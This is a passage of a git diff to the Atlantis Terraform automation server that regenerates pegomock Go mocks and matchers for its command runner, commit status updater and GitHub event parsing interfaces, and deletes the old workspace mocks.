+ var nullValue []models.ProjectCommandContext
+ return nullValue
+}
+
+func EqSliceOfModelsProjectCommandContext(value []models.ProjectCommandContext) []models.ProjectCommandContext {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue []models.ProjectCommandContext
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/webhooks_applyresult.go b/server/events/mocks/matchers/webhooks_applyresult.go
new file mode 100644
index 0000000000..2a643f6034
--- /dev/null
+++ b/server/events/mocks/matchers/webhooks_applyresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ webhooks "github.com/runatlantis/atlantis/server/events/webhooks"
+)
+
+func AnyWebhooksApplyResult() webhooks.ApplyResult {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(webhooks.ApplyResult))(nil)).Elem()))
+ var nullValue webhooks.ApplyResult
+ return nullValue
+}
+
+func EqWebhooksApplyResult(value webhooks.ApplyResult) webhooks.ApplyResult {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue webhooks.ApplyResult
+ return nullValue
+}
diff --git a/server/events/mocks/mock_atlantis_workspace.go b/server/events/mocks/mock_atlantis_workspace.go
deleted file mode 100644
index 643813cede..0000000000
--- a/server/events/mocks/mock_atlantis_workspace.go
+++ /dev/null
@@ -1,191 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: AtlantisWorkspace)
-
-package mocks
-
-import (
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
- models "github.com/runatlantis/atlantis/server/events/models"
- logging "github.com/runatlantis/atlantis/server/logging"
-)
-
-type MockAtlantisWorkspace struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockAtlantisWorkspace() *MockAtlantisWorkspace {
- return &MockAtlantisWorkspace{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockAtlantisWorkspace) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error) {
- params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Clone", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 string
- var ret1 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(string)
- }
- if result[1] != nil {
- ret1 = result[1].(error)
- }
- }
- return ret0, ret1
-}
-
-func (mock *MockAtlantisWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error) {
- params := []pegomock.Param{r, p, workspace}
- result := pegomock.GetGenericMockFrom(mock).Invoke("GetWorkspace", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 string
- var ret1 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(string)
- }
- if result[1] != nil {
- ret1 = result[1].(error)
- }
- }
- return ret0, ret1
-}
-
-func (mock *MockAtlantisWorkspace) Delete(r models.Repo, p models.PullRequest) error {
- params := []pegomock.Param{r, p}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Delete", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(error)
- }
- }
- return ret0
-}
-
-func (mock *MockAtlantisWorkspace) VerifyWasCalledOnce() *VerifierAtlantisWorkspace {
- return &VerifierAtlantisWorkspace{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockAtlantisWorkspace) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierAtlantisWorkspace {
- return &VerifierAtlantisWorkspace{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockAtlantisWorkspace) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierAtlantisWorkspace {
- return &VerifierAtlantisWorkspace{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierAtlantisWorkspace struct {
- mock *MockAtlantisWorkspace
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierAtlantisWorkspace) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) *AtlantisWorkspace_Clone_OngoingVerification {
- params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Clone", params)
- return &AtlantisWorkspace_Clone_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspace_Clone_OngoingVerification struct {
- mock *MockAtlantisWorkspace
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspace_Clone_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.Repo, models.Repo, models.PullRequest, string) {
- log, baseRepo, headRepo, p, workspace := c.GetAllCapturedArguments()
- return log[len(log)-1], baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], p[len(p)-1], workspace[len(workspace)-1]
-}
-
-func (c *AtlantisWorkspace_Clone_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.Repo, _param2 []models.Repo, _param3 []models.PullRequest, _param4 []string) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*logging.SimpleLogger, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*logging.SimpleLogger)
- }
- _param1 = make([]models.Repo, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(models.Repo)
- }
- _param2 = make([]models.Repo, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(models.Repo)
- }
- _param3 = make([]models.PullRequest, len(params[3]))
- for u, param := range params[3] {
- _param3[u] = param.(models.PullRequest)
- }
- _param4 = make([]string, len(params[4]))
- for u, param := range params[4] {
- _param4[u] = param.(string)
- }
- }
- return
-}
-
-func (verifier *VerifierAtlantisWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) *AtlantisWorkspace_GetWorkspace_OngoingVerification {
- params := []pegomock.Param{r, p, workspace}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GetWorkspace", params)
- return &AtlantisWorkspace_GetWorkspace_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspace_GetWorkspace_OngoingVerification struct {
- mock *MockAtlantisWorkspace
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspace_GetWorkspace_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
- r, p, workspace := c.GetAllCapturedArguments()
- return r[len(r)-1], p[len(p)-1], workspace[len(workspace)-1]
-}
-
-func (c *AtlantisWorkspace_GetWorkspace_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]models.Repo, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(models.Repo)
- }
- _param1 = make([]models.PullRequest, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(models.PullRequest)
- }
- _param2 = make([]string, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(string)
- }
- }
- return
-}
-
-func (verifier *VerifierAtlantisWorkspace) Delete(r models.Repo, p models.PullRequest) *AtlantisWorkspace_Delete_OngoingVerification {
- params := []pegomock.Param{r, p}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Delete", params)
- return &AtlantisWorkspace_Delete_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspace_Delete_OngoingVerification struct {
- mock *MockAtlantisWorkspace
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspace_Delete_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
- r, p := c.GetAllCapturedArguments()
- return r[len(r)-1], p[len(p)-1]
-}
-
-func (c *AtlantisWorkspace_Delete_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]models.Repo, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(models.Repo)
- }
- _param1 = make([]models.PullRequest, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(models.PullRequest)
- }
- }
- return
-}
diff --git a/server/events/mocks/mock_atlantis_workspace_locker.go b/server/events/mocks/mock_atlantis_workspace_locker.go
deleted file mode 100644
index 3f190f396e..0000000000
--- a/server/events/mocks/mock_atlantis_workspace_locker.go
+++ /dev/null
@@ -1,123 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: AtlantisWorkspaceLocker)
-
-package mocks
-
-import (
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
-)
-
-type MockAtlantisWorkspaceLocker struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockAtlantisWorkspaceLocker() *MockAtlantisWorkspaceLocker {
- return &MockAtlantisWorkspaceLocker{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool {
- params := []pegomock.Param{repoFullName, workspace, pullNum}
- result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((*bool)(nil)).Elem()})
- var ret0 bool
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(bool)
- }
- }
- return ret0
-}
-
-func (mock *MockAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) {
- params := []pegomock.Param{repoFullName, workspace, pullNum}
- pegomock.GetGenericMockFrom(mock).Invoke("Unlock", params, []reflect.Type{})
-}
-
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalledOnce() *VerifierAtlantisWorkspaceLocker {
- return &VerifierAtlantisWorkspaceLocker{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierAtlantisWorkspaceLocker {
- return &VerifierAtlantisWorkspaceLocker{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierAtlantisWorkspaceLocker {
- return &VerifierAtlantisWorkspaceLocker{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierAtlantisWorkspaceLocker struct {
- mock *MockAtlantisWorkspaceLocker
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_TryLock_OngoingVerification {
- params := []pegomock.Param{repoFullName, workspace, pullNum}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params)
- return &AtlantisWorkspaceLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspaceLocker_TryLock_OngoingVerification struct {
- mock *MockAtlantisWorkspaceLocker
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetCapturedArguments() (string, string, int) {
- repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
- return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
-}
-
-func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]string, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(string)
- }
- _param1 = make([]string, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(string)
- }
- _param2 = make([]int, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(int)
- }
- }
- return
-}
-
-func (verifier *VerifierAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_Unlock_OngoingVerification {
- params := []pegomock.Param{repoFullName, workspace, pullNum}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params)
- return &AtlantisWorkspaceLocker_Unlock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspaceLocker_Unlock_OngoingVerification struct {
- mock *MockAtlantisWorkspaceLocker
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspaceLocker_Unlock_OngoingVerification) GetCapturedArguments() (string, string, int) {
- repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
- return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
-}
-
-func (c *AtlantisWorkspaceLocker_Unlock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]string, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(string)
- }
- _param1 = make([]string, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(string)
- }
- _param2 = make([]int, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(int)
- }
- }
- return
-}
diff --git a/server/events/mocks/mock_command_runner.go b/server/events/mocks/mock_command_runner.go
index 481fcf72f5..8ef3387c0d 100644
--- a/server/events/mocks/mock_command_runner.go
+++ b/server/events/mocks/mock_command_runner.go
@@ -19,9 +19,14 @@ func NewMockCommandRunner() *MockCommandRunner {
return &MockCommandRunner{fail: pegomock.GlobalFailHandler}
}
-func (mock *MockCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) {
- params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd}
- pegomock.GetGenericMockFrom(mock).Invoke("ExecuteCommand", params, []reflect.Type{})
+func (mock *MockCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) {
+ params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd}
+ pegomock.GetGenericMockFrom(mock).Invoke("RunCommentCommand", params, []reflect.Type{})
+}
+
+func (mock *MockCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) {
+ params := []pegomock.Param{baseRepo, headRepo, pull, user}
+ pegomock.GetGenericMockFrom(mock).Invoke("RunAutoplanCommand", params, []reflect.Type{})
}
func (mock *MockCommandRunner) VerifyWasCalledOnce() *VerifierCommandRunner {
@@ -42,32 +47,32 @@ type VerifierCommandRunner struct {
inOrderContext *pegomock.InOrderContext
}
-func (verifier *VerifierCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) *CommandRunner_ExecuteCommand_OngoingVerification {
- params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ExecuteCommand", params)
- return &CommandRunner_ExecuteCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+func (verifier *VerifierCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) *CommandRunner_RunCommentCommand_OngoingVerification {
+ params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunCommentCommand", params)
+ return &CommandRunner_RunCommentCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
-type CommandRunner_ExecuteCommand_OngoingVerification struct {
+type CommandRunner_RunCommentCommand_OngoingVerification struct {
mock *MockCommandRunner
methodInvocations []pegomock.MethodInvocation
}
-func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.User, int, *events.Command) {
- baseRepo, headRepo, user, pullNum, cmd := c.GetAllCapturedArguments()
- return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1]
+func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetCapturedArguments() (models.Repo, *models.Repo, models.User, int, *events.CommentCommand) {
+ baseRepo, maybeHeadRepo, user, pullNum, cmd := c.GetAllCapturedArguments()
+ return baseRepo[len(baseRepo)-1], maybeHeadRepo[len(maybeHeadRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1]
}
-func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.Command) {
+func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []*models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.CommentCommand) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
_param0 = make([]models.Repo, len(params[0]))
for u, param := range params[0] {
_param0[u] = param.(models.Repo)
}
- _param1 = make([]models.Repo, len(params[1]))
+ _param1 = make([]*models.Repo, len(params[1]))
for u, param := range params[1] {
- _param1[u] = param.(models.Repo)
+ _param1[u] = param.(*models.Repo)
}
_param2 = make([]models.User, len(params[2]))
for u, param := range params[2] {
@@ -77,9 +82,48 @@ func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArgumen
for u, param := range params[3] {
_param3[u] = param.(int)
}
- _param4 = make([]*events.Command, len(params[4]))
+ _param4 = make([]*events.CommentCommand, len(params[4]))
for u, param := range params[4] {
- _param4[u] = param.(*events.Command)
+ _param4[u] = param.(*events.CommentCommand)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) *CommandRunner_RunAutoplanCommand_OngoingVerification {
+ params := []pegomock.Param{baseRepo, headRepo, pull, user}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunAutoplanCommand", params)
+ return &CommandRunner_RunAutoplanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type CommandRunner_RunAutoplanCommand_OngoingVerification struct {
+ mock *MockCommandRunner
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.PullRequest, models.User) {
+ baseRepo, headRepo, pull, user := c.GetAllCapturedArguments()
+ return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], pull[len(pull)-1], user[len(user)-1]
+}
+
+func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.PullRequest, _param3 []models.User) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.Repo, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.Repo)
+ }
+ _param2 = make([]models.PullRequest, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(models.PullRequest)
+ }
+ _param3 = make([]models.User, len(params[3]))
+ for u, param := range params[3] {
+ _param3[u] = param.(models.User)
}
}
return
diff --git a/server/events/mocks/mock_commit_status_updater.go b/server/events/mocks/mock_commit_status_updater.go
index 3ed9e933b4..e5815d4144 100644
--- a/server/events/mocks/mock_commit_status_updater.go
+++ b/server/events/mocks/mock_commit_status_updater.go
@@ -20,8 +20,8 @@ func NewMockCommitStatusUpdater() *MockCommitStatusUpdater {
return &MockCommitStatusUpdater{fail: pegomock.GlobalFailHandler}
}
-func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) error {
- params := []pegomock.Param{repo, pull, status, cmd}
+func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) error {
+ params := []pegomock.Param{repo, pull, status, command}
result := pegomock.GetGenericMockFrom(mock).Invoke("Update", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
var ret0 error
if len(result) != 0 {
@@ -32,8 +32,8 @@ func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRe
return ret0
}
-func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) error {
- params := []pegomock.Param{ctx, res}
+func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) error {
+ params := []pegomock.Param{ctx, commandName, res}
result := pegomock.GetGenericMockFrom(mock).Invoke("UpdateProjectResult", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
var ret0 error
if len(result) != 0 {
@@ -62,8 +62,8 @@ type VerifierCommitStatusUpdater struct {
inOrderContext *pegomock.InOrderContext
}
-func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) *CommitStatusUpdater_Update_OngoingVerification {
- params := []pegomock.Param{repo, pull, status, cmd}
+func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) *CommitStatusUpdater_Update_OngoingVerification {
+ params := []pegomock.Param{repo, pull, status, command}
methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Update", params)
return &CommitStatusUpdater_Update_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
@@ -73,12 +73,12 @@ type CommitStatusUpdater_Update_OngoingVerification struct {
methodInvocations []pegomock.MethodInvocation
}
-func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, *events.Command) {
- repo, pull, status, cmd := c.GetAllCapturedArguments()
- return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], cmd[len(cmd)-1]
+func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, events.CommandName) {
+ repo, pull, status, command := c.GetAllCapturedArguments()
+ return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], command[len(command)-1]
}
-func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []*events.Command) {
+func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []events.CommandName) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
_param0 = make([]models.Repo, len(params[0]))
@@ -93,16 +93,16 @@ func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments
for u, param := range params[2] {
_param2[u] = param.(vcs.CommitStatus)
}
- _param3 = make([]*events.Command, len(params[3]))
+ _param3 = make([]events.CommandName, len(params[3]))
for u, param := range params[3] {
- _param3[u] = param.(*events.Command)
+ _param3[u] = param.(events.CommandName)
}
}
return
}
-func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification {
- params := []pegomock.Param{ctx, res}
+func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification {
+ params := []pegomock.Param{ctx, commandName, res}
methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "UpdateProjectResult", params)
return &CommitStatusUpdater_UpdateProjectResult_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
@@ -112,21 +112,25 @@ type CommitStatusUpdater_UpdateProjectResult_OngoingVerification struct {
methodInvocations []pegomock.MethodInvocation
}
-func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandResponse) {
- ctx, res := c.GetAllCapturedArguments()
- return ctx[len(ctx)-1], res[len(res)-1]
+func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandName, events.CommandResult) {
+ ctx, commandName, res := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1], commandName[len(commandName)-1], res[len(res)-1]
}
-func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandResponse) {
+func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandName, _param2 []events.CommandResult) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
_param0 = make([]*events.CommandContext, len(params[0]))
for u, param := range params[0] {
_param0[u] = param.(*events.CommandContext)
}
- _param1 = make([]events.CommandResponse, len(params[1]))
+ _param1 = make([]events.CommandName, len(params[1]))
for u, param := range params[1] {
- _param1[u] = param.(events.CommandResponse)
+ _param1[u] = param.(events.CommandName)
+ }
+ _param2 = make([]events.CommandResult, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(events.CommandResult)
}
}
return
diff --git a/server/events/mocks/mock_event_parsing.go b/server/events/mocks/mock_event_parsing.go
index e88b581dce..1c1feaf31c 100644
--- a/server/events/mocks/mock_event_parsing.go
+++ b/server/events/mocks/mock_event_parsing.go
@@ -44,12 +44,13 @@ func (mock *MockEventParsing) ParseGithubIssueCommentEvent(comment *github.Issue
return ret0, ret1, ret2, ret3
}
-func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) {
+func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error) {
params := []pegomock.Param{pull}
- result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
var ret0 models.PullRequest
var ret1 models.Repo
- var ret2 error
+ var ret2 models.Repo
+ var ret3 error
if len(result) != 0 {
if result[0] != nil {
ret0 = result[0].(models.PullRequest)
@@ -58,10 +59,41 @@ func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.
ret1 = result[1].(models.Repo)
}
if result[2] != nil {
- ret2 = result[2].(error)
+ ret2 = result[2].(models.Repo)
+ }
+ if result[3] != nil {
+ ret3 = result[3].(error)
}
}
- return ret0, ret1, ret2
+ return ret0, ret1, ret2, ret3
+}
+
+func (mock *MockEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
+ params := []pegomock.Param{pullEvent}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPullEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 models.PullRequest
+ var ret1 models.Repo
+ var ret2 models.Repo
+ var ret3 models.User
+ var ret4 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(models.PullRequest)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(models.Repo)
+ }
+ if result[2] != nil {
+ ret2 = result[2].(models.Repo)
+ }
+ if result[3] != nil {
+ ret3 = result[3].(models.User)
+ }
+ if result[4] != nil {
+ ret4 = result[4].(error)
+ }
+ }
+ return ret0, ret1, ret2, ret3, ret4
}
func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) {
